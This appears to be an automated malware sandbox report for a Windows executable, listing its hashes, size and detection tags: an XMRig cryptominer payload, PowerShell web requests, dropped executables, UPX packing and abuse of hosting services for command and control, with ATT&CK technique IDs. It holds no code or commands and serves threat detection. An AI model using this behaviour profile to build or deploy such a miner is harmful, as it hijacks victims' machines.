General

  • Target

    93ea8abb8e16d2661f06e607c37ab0d0_NeikiAnalytics.exe

  • Size

    3.2MB

  • Sample

    240614-avm2wa1fmn

  • MD5

    93ea8abb8e16d2661f06e607c37ab0d0

  • SHA1

    cfd6690ad8647df1937fcd0bfeab86f095d36805

  • SHA256

    80cd5991af8c96fc742276a45d103c7dab724cb63f9ba994caa90852a967ae5b

  • SHA512

    40802cda5ac0ff7853422ab78fbd6e4f9b46f9579412bdd3aa5fd298df1d67ccfe137220d7c82f30bc4ebe031fcf1fdccacc59456d8e31e538226fa095eaa414

  • SSDEEP

    98304:71ONtyBeSFkXV1etEKLlWUTOfeiRA2R76zHrWw:7bBeSFk8

Malware Config

Targets

    • Target

      93ea8abb8e16d2661f06e607c37ab0d0_NeikiAnalytics.exe

    • Size

      3.2MB

    • MD5

      93ea8abb8e16d2661f06e607c37ab0d0

    • SHA1

      cfd6690ad8647df1937fcd0bfeab86f095d36805

    • SHA256

      80cd5991af8c96fc742276a45d103c7dab724cb63f9ba994caa90852a967ae5b

    • SHA512

      40802cda5ac0ff7853422ab78fbd6e4f9b46f9579412bdd3aa5fd298df1d67ccfe137220d7c82f30bc4ebe031fcf1fdccacc59456d8e31e538226fa095eaa414

    • SSDEEP

      98304:71ONtyBeSFkXV1etEKLlWUTOfeiRA2R76zHrWw:7bBeSFk8

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • XMRig Miner payload

    • Command and Scripting Interpreter: PowerShell

      Powershell Invoke Web Request.

    • Executes dropped EXE

    • Loads dropped DLL

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Legitimate hosting services abused for malware hosting/C2

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Command and Control

Web Service

1
T1102

Tasks